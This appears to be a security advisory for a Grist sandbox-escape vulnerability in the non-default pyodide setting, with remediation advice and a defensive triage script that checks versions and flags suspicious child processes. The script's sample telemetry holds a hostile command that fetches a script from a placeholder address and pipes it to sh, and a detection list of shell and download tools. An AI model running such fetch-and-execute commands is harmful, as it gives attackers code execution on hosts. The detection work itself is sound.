CVE-2026-24002

Grist · Grist spreadsheet software

A critical vulnerability exists in the Grist spreadsheet software that allows for a sandbox escape, leading to remote code execution.

Executive summary

A critical vulnerability exists in the Grist spreadsheet software that allows for a sandbox escape, leading to remote code execution. If an administrator has configured a specific, non-default setting for formula processing, an attacker can gain full control of the server by tricking a user into opening a specially crafted spreadsheet. This could result in complete system compromise, data theft, and disruption of service.

Vulnerability

The vulnerability is reachable only in a specific, non-default configuration of the Grist application. Grist evaluates the Python formulas contained in a document inside a sandbox so that untrusted formula code cannot touch the host. When the environment variable GRIST_SANDBOX_FLAVOR is explicitly set to pyodide, formulas are run through the Pyodide sandbox hosted by the underlying Node.js runtime, and that barrier is not a sound security boundary. An attacker who can get a crafted document opened on the server can supply Python formulas that break out of the intended confinement and execute arbitrary commands with the permissions of the Grist service account on the host.

Business impact

This vulnerability is rated as critical severity with a CVSS score of 9.0, reflecting the high potential for significant business disruption. Successful exploitation could lead to a complete compromise of the server hosting the Grist application. This could result in the theft or modification of all sensitive data stored in spreadsheets, a breach of customer or internal information, and reputational damage. Furthermore, a compromised server could be used as a pivot point to launch further attacks against the internal network, escalating the security incident.

Remediation

Immediate Action: Update Grist to the latest version; the vulnerability is patched in Grist version 1.7.9 and higher. Monitor for exploitation attempts and review access logs.

Proactive Monitoring: Security teams should monitor for anomalous activity on Grist servers. Specifically, look for unexpected child processes being spawned by the Grist service (e.g., sh, bash, powershell, curl, wget). Monitor for unusual outbound network connections from the server, as this may indicate command-and-control communication or data exfiltration. Review application logs for errors or warnings related to the pyodide sandbox.

Compensating Controls: If immediate patching to version 1.7.9 or later is not feasible, implement the vendor-recommended workaround: set the GRIST_SANDBOX_FLAVOR environment variable to gvisor, which runs formulas inside a gVisor sandbox and provides a more secure isolation boundary. The gvisor flavor depends on gVisor's runsc runtime being available on the host, so confirm after the change that the sandbox actually starts and that formulas still recalculate; a Grist instance whose sandbox fails to launch does not silently fall back to a safe state you can rely on without checking.
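The following is an added triage script, not Grist's own code and not part of this advisory, covering both the monitoring guidance above (suspicious child processes under the Grist service) and the compensating control (flavor and version check). It assumes the instance's environment is available as a dict, that the version string follows MAJOR.MINOR.PATCH, and that process-spawn telemetry can be exported as tab-separated records of timestamp, parent name, parent PID, child name, child PID and command line; the sample records, PIDs, paths and addresses are constructed for illustration. The ancestry walk goes beyond the advisory's wording by also flagging grandchildren of the Grist process, since a `curl` launched from an attacker's `sh` is one process removed from the service.

```python
import re

PATCHED_VERSION = (1, 7, 9)       # fixed in 1.7.9 and higher (from the advisory)
UNSAFE_FLAVOR = "pyodide"         # vulnerable non-default setting
RECOMMENDED_FLAVOR = "gvisor"     # vendor-recommended workaround
# Child process names the advisory lists as indicators; extend for your estate.
SUSPICIOUS_CHILDREN = {"sh", "bash", "powershell", "curl", "wget"}


def parse_version(version):
    """Turn '1.7.9', 'v1.7.9' or '1.7.9-rc1' into a comparable (1, 7, 9) tuple."""
    m = re.match(r"v?(\d+)\.(\d+)\.(\d+)", version.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {version!r}")
    return tuple(int(x) for x in m.groups())


def assess_deployment(env, version):
    """Classify one Grist instance from its environment and installed version.

    'patched'     : running 1.7.9 or later, flavor irrelevant.
    'vulnerable'  : older release with GRIST_SANDBOX_FLAVOR=pyodide.
    'not_exposed' : older release, but the pyodide path is not selected
                    (still schedule the upgrade).
    """
    flavor = env.get("GRIST_SANDBOX_FLAVOR", "").strip().lower()
    if parse_version(version) >= PATCHED_VERSION:
        return "patched"
    if flavor == UNSAFE_FLAVOR:
        return "vulnerable"
    return "not_exposed"


def hardened_env(env):
    """Return a copy of env with the vendor workaround applied (flavor -> gvisor)."""
    fixed = dict(env)
    fixed["GRIST_SANDBOX_FLAVOR"] = RECOMMENDED_FLAVOR
    return fixed


def parse_events(text):
    """Parse tab-separated spawn records (assumed format, not a Grist log):
    ts, parent_comm, parent_pid, child_comm, child_pid, cmdline."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, pcomm, ppid, ccomm, cpid, cmdline = line.split("\t", 5)
        events.append({"ts": ts, "pcomm": pcomm, "ppid": int(ppid),
                       "comm": ccomm, "pid": int(cpid), "cmdline": cmdline})
    return events


def detect_suspicious_spawns(text, grist_pid):
    """Flag suspicious processes anywhere beneath the Grist service process.

    Walks each child's ancestry through the parent map built from the same
    records, so an `sh` launched by the sandbox worker and the `curl` that
    `sh` then runs are both reported, while an unrelated cron `sh` is not.
    """
    events = parse_events(text)
    parent_of = {e["pid"]: e["ppid"] for e in events}
    findings = []
    for e in events:
        if e["comm"] not in SUSPICIOUS_CHILDREN:
            continue
        cur, seen = e["ppid"], set()
        while cur is not None and cur not in seen:   # guard against cyclic pid reuse
            if cur == grist_pid:
                findings.append((e["pid"], e["comm"], e["cmdline"]))
                break
            seen.add(cur)
            cur = parent_of.get(cur)
    return findings


# Constructed sample telemetry (not real logs). PID 4120 is the Grist node process;
# the worker path and the 198.51.100.7 address are placeholders.
SAMPLE_EVENTS = (
    "2026-02-10T10:00:01Z\tnode\t4120\tnode\t4131\tnode sandbox-worker.js\n"
    "2026-02-10T10:00:05Z\tnode\t4120\tsh\t4140\tsh -c 'curl http://198.51.100.7/x | sh'\n"
    "2026-02-10T10:00:05Z\tsh\t4140\tcurl\t4141\tcurl http://198.51.100.7/x\n"
    "2026-02-10T10:02:00Z\tcron\t901\tsh\t4200\tsh -c /usr/local/bin/backup.sh\n"
)

if __name__ == "__main__":
    env = {"GRIST_SANDBOX_FLAVOR": "pyodide", "PORT": "8484"}
    print("1.7.8 + pyodide   :", assess_deployment(env, "1.7.8"))
    print("1.7.8 + workaround:", assess_deployment(hardened_env(env), "1.7.8"))
    print("1.7.9 + pyodide   :", assess_deployment(env, "1.7.9"))
    for pid, comm, cmd in detect_suspicious_spawns(SAMPLE_EVENTS, grist_pid=4120):
        print(f"ALERT pid={pid} comm={comm} cmdline={cmd}")
```

The legitimate sandbox worker (a `node` child of the service) is not flagged because it is not in the indicator set; tune that set rather than the ancestry logic if your deployment legitimately spawns shells, and feed the real parent PID of the Grist service from your process manager instead of the constructed 4120.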

Exploitation status

Public Exploit Available: false

Analyst recommendation

Due to the critical CVSS score of 9.0 and the risk of complete server compromise, it is strongly recommended that organizations patch this vulnerability with the highest priority. The primary course of action is to upgrade all Grist instances to version 1.7.9 or newer. If patching must be delayed for any reason, the compensating control of switching the sandbox flavor to gvisor should be implemented immediately to mitigate the risk.